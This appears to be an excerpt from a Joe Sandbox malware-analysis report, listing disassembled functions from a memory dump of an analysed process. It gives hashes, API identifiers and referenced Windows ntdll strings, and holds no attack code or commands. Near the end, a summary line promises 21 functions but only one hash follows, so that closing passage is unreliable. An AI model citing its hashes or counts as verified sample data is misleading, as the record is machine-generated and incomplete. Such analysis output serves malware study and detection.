                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: #%u
                                                                                          • API String ID: 48624451-232158463
                                                                                          • Opcode ID: 636e46d47e05157f66c85951343252959959ba8e32df4e7d8de6ef525281fe16
                                                                                          • Instruction ID: 09ff5e81a7e536617f78e2754b361a274ee3628c0aae6e89629cec0d920b6afc
                                                                                          • Opcode Fuzzy Hash: 636e46d47e05157f66c85951343252959959ba8e32df4e7d8de6ef525281fe16
                                                                                          • Instruction Fuzzy Hash: 62714CB5A001499FDB01EFA8D990FAEB7F8FF08704F154065E905E7252EA34EE41CB61
                                                                                          APIs
                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 2A0CCFBD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallFilterFunc@8
                                                                                          • String ID: @
                                                                                          • API String ID: 4062629308-2766056989
                                                                                          • Opcode ID: 92cd6b1b2e4a10e1a3920906e1bf3b3c9502ccaf51d1cc1e2602a2f30df3bd1c
                                                                                          • Instruction ID: 27f17d31b958e14a61ae13478d720567540bd70ee1f841aabeb3e607e13d87ba
                                                                                          • Opcode Fuzzy Hash: 92cd6b1b2e4a10e1a3920906e1bf3b3c9502ccaf51d1cc1e2602a2f30df3bd1c
                                                                                          • Instruction Fuzzy Hash: 4F41B472900214EFCB21EF99D840A6EBBF9FF58710F11407AE914DB265E734D941CB69
                                                                                          Strings
                                                                                          • LdrResSearchResource Exit, xrefs: 2A04AA25
                                                                                          • LdrResSearchResource Enter, xrefs: 2A04AA13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                          • API String ID: 0-4066393604
                                                                                          • Opcode ID: 61ed1003f6d4e3b26bf179b652a7747693b6422c3659a334cbcad4932b323db5
                                                                                          • Instruction ID: a2248e0ab4f6c07a88baefa6a8ed80770249c7cf3077d76dd0490e3eab617be1
                                                                                          • Opcode Fuzzy Hash: 61ed1003f6d4e3b26bf179b652a7747693b6422c3659a334cbcad4932b323db5
                                                                                          • Instruction Fuzzy Hash: C9E18B71E40218AFEB21EFD6D990B9EB7B9FF18350F11407AEA00EB252D7749940EB51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$`
                                                                                          • API String ID: 0-197956300
                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                          • Instruction ID: 3e7706858745ef063098398e56e08fbfc1210e728e033883008272bf4bbd9aa2
                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                          • Instruction Fuzzy Hash: 0CC1DF712043429BD724DF24C841BABBBE5BF84368F058A2CFA95CB2D1D775D605CB82
                                                                                          Strings
                                                                                          • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 2A0E3011
                                                                                          • , xrefs: 2A0E32B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                          • API String ID: 0-4088147954
                                                                                          • Opcode ID: 33a25999b7e1d96b1555c9a16c5b39b44024abd11b4fe3a63997a20b9fcce73d
                                                                                          • Instruction ID: 3238ecdf27f5f00629d5d1e570b7455c2077dedf832f64e4fe85a27b17f87da5
                                                                                          • Opcode Fuzzy Hash: 33a25999b7e1d96b1555c9a16c5b39b44024abd11b4fe3a63997a20b9fcce73d
                                                                                          • Instruction Fuzzy Hash: 5EC1BC31608341AFD710EF21D690B1BBBE5AFD8704F0149BDEA988B241DBB5D944EB93
                                                                                          Strings
                                                                                          • LdrpResGetMappingSize Exit, xrefs: 2A04AC7C
                                                                                          • LdrpResGetMappingSize Enter, xrefs: 2A04AC6A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                          • API String ID: 0-1497657909
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$MUI
                                                                                          • API String ID: 0-17815947
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$Flst
                                                                                          • API String ID: 0-758220159
                                                                                          Strings
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 2A0B280C
                                                                                          • RtlpInsertAssemblyStorageMapEntry, xrefs: 2A0B2807
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                          • API String ID: 0-2104531740
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 2A04A309
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 2A04A2FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          • API String ID: 0-2876891731
                                                                                          Strings
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 2A081025
                                                                                          • @, xrefs: 2A081050
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                          • API String ID: 0-2976085014
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PATH
                                                                                          • API String ID: 0-1036084923
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w
                                                                                          • API String ID: 0-476252946
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .mui
                                                                                          • API String ID: 0-1199573805
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AlternateCodePage
                                                                                          • API String ID: 0-3889302423
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TrustedInstaller
                                                                                          • API String ID: 0-565535830
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #
                                                                                          • API String ID: 0-1885708031
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryName
                                                                                          • API String ID: 0-215506332
                                                                                          Strings
                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 2A0DAF2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                          • API String ID: 0-1911121157
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: WindowsExcludedProcs
                                                                                          • API String ID: 0-3583428290
                                                                                          • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                          • Instruction ID: 699d27f637cb2f906438535b1989a7c265825d9cda560fa09c59da09342abf20
                                                                                          • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                          • Instruction Fuzzy Hash: 82213436541228BFCB22BA84D840F4F77FDAFA5E94F020072FA049B201CA34CE058BB5
                                                                                          Strings
                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 2A0C895E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                          • API String ID: 0-702105204
                                                                                          • Opcode ID: 072ebdfbe32adfcb71fcc2e2d3cf1f0514c652405e1cbdd298604b15dc259673
                                                                                          • Instruction ID: 16e157ca1b4cc3d2e49a75493e66ff47180d35eddc5842a458eed95830c37ebd
                                                                                          • Opcode Fuzzy Hash: 072ebdfbe32adfcb71fcc2e2d3cf1f0514c652405e1cbdd298604b15dc259673
                                                                                          • Instruction Fuzzy Hash: 28012B32200200AFD6147F51DCC4F9E7BABEF816B0B090038E74116052DB28AC48D69E
                                                                                          Strings
                                                                                          • Critical error detected %lx, xrefs: 2A0F7027
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Critical error detected %lx
                                                                                          • API String ID: 0-802127002
                                                                                          • Opcode ID: ed47ff4c9ea24a1dbb50fb4ae76a7fc221fe05858c14689aef65246e712f62ba
                                                                                          • Instruction ID: 2ddf2d4cd52fe449c3557425a6df92351b9314e76b826cc244995febc5cd6a44
                                                                                          • Opcode Fuzzy Hash: ed47ff4c9ea24a1dbb50fb4ae76a7fc221fe05858c14689aef65246e712f62ba
                                                                                          • Instruction Fuzzy Hash: 69118776D00308CBDB25EFA4D841BEDFBB1EB04714F20462ED225AB282EB752A01CF15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bc054bbbb5e62c4e0b80d5aee99d586530db54aab6fa324430a927d898c5043c
                                                                                          • Instruction ID: 5dd7730f7950c80740bb78fc72bfde800847a242df502f0e9a5ad4ede7ed8aa5
                                                                                          • Opcode Fuzzy Hash: bc054bbbb5e62c4e0b80d5aee99d586530db54aab6fa324430a927d898c5043c
                                                                                          • Instruction Fuzzy Hash: 3E42E9726083409FDB15EF64CA90A2FF7E5BB8C300F05093EFA8A87251D671E945EB52
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 09118e2c127e93b66e9dde5b730f1a83bbde0e3cc936a797a15a02bc7c4953da
                                                                                          • Instruction ID: 3057e1fc73003c44faed4d5b27db495b203ca40e08b9575595cdec1ccf194f68
                                                                                          • Opcode Fuzzy Hash: 09118e2c127e93b66e9dde5b730f1a83bbde0e3cc936a797a15a02bc7c4953da
                                                                                          • Instruction Fuzzy Hash: 0932F170A007559FDB24EFE5C844BAEBBF6BF88704F10412DD6899B382D779A942CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8c53aab2cd8d72d74fe7770ed21c7bd4abf94e54a606b66604164beeb76f5c85
                                                                                          • Instruction ID: 26859edac861a67a150e086af72aeaf8acb9fde8940782db7d1248a7cbccb454
                                                                                          • Opcode Fuzzy Hash: 8c53aab2cd8d72d74fe7770ed21c7bd4abf94e54a606b66604164beeb76f5c85
                                                                                          • Instruction Fuzzy Hash: 3E2212706006509FD724EF2AD290776B7F1AF4D342F0584BAE99E8F286D374D542EB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9b0dda5b84e67fd6ce46b86d0c87bde8e75691b2b85655164fc5bd5d9a83524c
                                                                                          • Instruction ID: 40c957d6f360e5a071d2721f4b6dfd7e44796f262e5bc3a800e799481c8c6bf5
                                                                                          • Opcode Fuzzy Hash: 9b0dda5b84e67fd6ce46b86d0c87bde8e75691b2b85655164fc5bd5d9a83524c
                                                                                          • Instruction Fuzzy Hash: 0422A370E00216DFCB18DF95D490AAEFBF2FF48704B1580AAE9459B202E774DE51DBA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0c7fe5156de1f0378cc3444d1cc25f134538d3a1b2470530ead7c5ce8ed93732
                                                                                          • Instruction ID: 98b83de57bdf82424466d129cf487c4c9a5ed7df6a5ae7ee29d38540e68a2bbd
                                                                                          • Opcode Fuzzy Hash: 0c7fe5156de1f0378cc3444d1cc25f134538d3a1b2470530ead7c5ce8ed93732
                                                                                          • Instruction Fuzzy Hash: 55327671A05604DFCB14EFA8D880A9EB7F1FF48310F108579EA55AB392EB74AD45CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                          • Instruction ID: 7414d299667ef8197126c15623cb0517c1050141a3c0a42500cdcde334e8024e
                                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                          • Instruction Fuzzy Hash: D5F1BF70E002099BCB15EF95D680BAEB7F5BF49B18F058139EA04AB345E776DD41CB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e68e90b3d57fe06e9bfb86a401db3608a67eb28114bc68356a25d5ce279e5a3
                                                                                          • Instruction ID: c4f2f25e901f5aa90799d3bf9db9d23e92640dd4818044bc8233ae52f5b90ad9
                                                                                          • Opcode Fuzzy Hash: 6e68e90b3d57fe06e9bfb86a401db3608a67eb28114bc68356a25d5ce279e5a3
                                                                                          • Instruction Fuzzy Hash: A0D13273A00B099BDB04DF58C840BEEB7F1EF88B14F198179D954A7251D735EA09CB64
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd1dbb0c4756da10dfc653b8fbc455e696548bc2d7ffaa43a16ebe342779c00b
                                                                                          • Instruction ID: 4b3927fabb5936b2fa2e70617212631285ddc9267a427d527b16e5b86a414538
                                                                                          • Opcode Fuzzy Hash: cd1dbb0c4756da10dfc653b8fbc455e696548bc2d7ffaa43a16ebe342779c00b
                                                                                          • Instruction Fuzzy Hash: DAD103B1A00206ABCB14EF64C8C0FBE7BE5BF54714F0546B9EA15DB281E774EA48CB54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e883f12088e37d42ae620ef03f5305d332dcba7735f7c36b9602704814b37f0b
                                                                                          • Instruction ID: cfdd4b3cd75900145eec79b66d7738562944e7ac24066098e7e12ffd2aaeeab6
                                                                                          • Opcode Fuzzy Hash: e883f12088e37d42ae620ef03f5305d332dcba7735f7c36b9602704814b37f0b
                                                                                          • Instruction Fuzzy Hash: 5AE15C72D00659DFCB14DFA8D890AAEBBF1FF49304F1581A9E844E7252E335E945CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e1bd516e212b08f0e41fa72a4bf27a02e2cbbc64350ded6564f40bfe7889e60
                                                                                          • Instruction ID: e73ff30799cf73b6e322902cb464a1987935ea7bf18d77c973ef45ffc60b58ca
                                                                                          • Opcode Fuzzy Hash: 5e1bd516e212b08f0e41fa72a4bf27a02e2cbbc64350ded6564f40bfe7889e60
                                                                                          • Instruction Fuzzy Hash: B4E10071D00608DFCB21EFA9D980A8DFBF1FF48758F20456AE956AB261D770A941DF10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                          • Instruction ID: f51e616974a81d706c50bfa12aad31cbdeb0cf6d1206828532e433b00f9611e4
                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                          • Instruction Fuzzy Hash: F1B18F74A00604AFDB14EF94C944EAFB7FAFF94304F50447AEA4297691FA34E909CB18
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1089fa11990ac7ea54e7fc88e593a803c0f9aa1dcd33430da1216d47020aa2da
                                                                                          • Instruction ID: 3431b8fe591a08339b2a6fe68f8e64e1f2747d93866989f057d456285fa1df55
                                                                                          • Opcode Fuzzy Hash: 1089fa11990ac7ea54e7fc88e593a803c0f9aa1dcd33430da1216d47020aa2da
                                                                                          • Instruction Fuzzy Hash: 8EC17A70E40249EFDB14EFE9C880E9EBBB9FF48718F108129E505AB286D775AD55CB40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5fa5ef20976332fa7bd055d9b4c591799341df7499b9e85a7f37e8546a6be97d
                                                                                          • Instruction ID: cf067c6b2e1a6a7548734d9c6a194a9d1ece322da32b6df8c3a2a5debad47202
                                                                                          • Opcode Fuzzy Hash: 5fa5ef20976332fa7bd055d9b4c591799341df7499b9e85a7f37e8546a6be97d
                                                                                          • Instruction Fuzzy Hash: F3C16774A08380CFD760DF54C494BABB7E5BF88304F40496DEA8987291E774EA49CF96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                          • Instruction ID: 1f78b38fbc3684b1694d71a287030ad4807db5edf0282e51932bad8d02fba566
                                                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                          • Instruction Fuzzy Hash: 98B13471E0061A9FCF18DFA9D880ADDF7B5BF48320F158179E914AB251D730AA41CF90
                                                                                          Memory Dump Source
• Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

All 21 functions below come from the same memory dump source and snapshot file (the 0x2A010000 region of process 3, mapped as PE); for each of them the Similarity fields (API ID, String ID, API String ID) are empty and the Opcode Fuzzy Hash is identical to the Opcode ID.

• Opcode ID: 891ff77d1017de270f294b4d640a1a4ab8912540a9e7f5936a55732cd1744515
